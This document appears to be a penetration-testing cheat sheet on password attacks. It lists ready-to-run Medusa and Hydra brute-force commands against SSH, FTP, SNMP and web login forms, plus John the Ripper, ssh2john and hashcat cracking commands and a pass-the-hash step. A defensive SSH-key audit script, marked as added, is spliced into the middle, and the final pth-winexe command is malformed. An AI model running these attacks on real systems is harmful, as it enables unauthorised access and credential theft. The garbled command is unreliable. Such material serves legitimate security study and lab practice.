# Password attacks

#### Wordlists: `/usr/share/wordlists`

### Medusa

Brute-force HTTP Basic authentication.

```
medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10
```

### Hydra

Can be used to brute force numerous services.

```
hydra -P password.txt -v 10.11.1.210 snmp
hydra -l admin -P password.txt -v 122.168.31.219 ftp
hydra -l root -P password.txt 10.11.1.219 ssh
hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin
```

#### Brute force http-post login forms

```
Format: hydra -L <path to user wordlist> -P <path to password wordlist> <IP Address> http-post-form "<Login Page>:<Request Body>:<Error Message>"

Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
```

### John the Ripper

```
john <hash.txt> --wordlist=/usr/share/wordlists/rockyou.txt
```

#### SSH keys

To crack an SSH key passphrase, convert the key to a hash, then crack it with John.

```
python ssh2john.py id_rsa > id_rsa.hash
```
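The defensive counterpart, as an added example that is not part of the original page: how long a key file holds up against this kind of offline guessing depends on whether it is encrypted and which KDF protects the passphrase, so this audit reads those fields from the key header. The names `audit_private_key` and `make_sample` are hypothetical, and the sample blobs are constructed headers with no key material.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\0"
OPENSSH_BEGIN = "-----BEGIN OPENSSH PRIVATE KEY-----"

def _read_string(buf, off):
    """Read one SSH wire-format string: uint32 length, then that many bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    if off + 4 + n > len(buf):
        raise ValueError("truncated key blob")
    return buf[off + 4:off + 4 + n], off + 4 + n

def audit_private_key(text):
    """Report how a private key file is protected against offline guessing."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN "):
        return {"format": "unknown", "encrypted": None}
    if lines[0] == "-----BEGIN ENCRYPTED PRIVATE KEY-----":
        return {"format": "pkcs8", "encrypted": True, "kdf": "in ASN.1, not parsed"}
    if lines[0] != OPENSSH_BEGIN:
        # Traditional PEM announces encryption in a Proc-Type header; the key is
        # derived with salted MD5 at iteration count 1 (no stretching).
        enc = any(l.startswith("Proc-Type:") and "ENCRYPTED" in l for l in lines)
        return {"format": "pem", "encrypted": enc,
                "kdf": "md5-single-pass" if enc else "none"}
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("bad openssh-key-v1 magic")
    cipher, off = _read_string(blob, len(MAGIC))
    kdf, off = _read_string(blob, off)
    kdfopts, off = _read_string(blob, off)
    info = {"format": "openssh-key-v1", "encrypted": cipher != b"none",
            "cipher": cipher.decode(), "kdf": kdf.decode()}
    if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
        _salt, o = _read_string(kdfopts, 0)
        (info["rounds"],) = struct.unpack_from(">I", kdfopts, o)
    return info

def make_sample(cipher, kdf, rounds=None):
    """Constructed header-only blob (no key material), for demonstration."""
    s = lambda b: struct.pack(">I", len(b)) + b
    opts = b"" if rounds is None else s(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = MAGIC + s(cipher) + s(kdf) + s(opts) + struct.pack(">I", 1)
    body = base64.b64encode(blob).decode()
    return f"{OPENSSH_BEGIN}\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"

if __name__ == "__main__":
    print(audit_private_key(make_sample(b"none", b"none")))
    print(audit_private_key(make_sample(b"aes256-ctr", b"bcrypt", rounds=16)))
```

Keys reported as unencrypted or as `md5-single-pass` are the ones to re-protect first; `ssh-keygen -p -a <rounds> -f <keyfile>` rewrites a key in the OpenSSH format with a higher bcrypt round count.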

### Hashcat

**Check for mode on wiki page**  <https://hashcat.net/wiki/doku.php?id=example_hashes>

```
hashcat -m (mode) -a 0 hash.txt Pass.txt
```

### Passing the hash (Windows)

Create an environment variable, SMBHASH, containing the hash we want to pass:

`export SMBHASH=hashvalue`

Use pth-winexe to authenticate:

`pth-winexe -U administrator% //10.11.0.1.76.cmd`
